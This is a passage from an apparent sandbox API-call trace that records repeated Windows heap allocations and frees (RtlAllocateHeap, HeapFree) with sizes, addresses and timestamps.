lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.930] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0236.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7d120 | out: hHeap=0x620000) returned 1 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7d120 [0236.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0236.935] HeapFree (in: 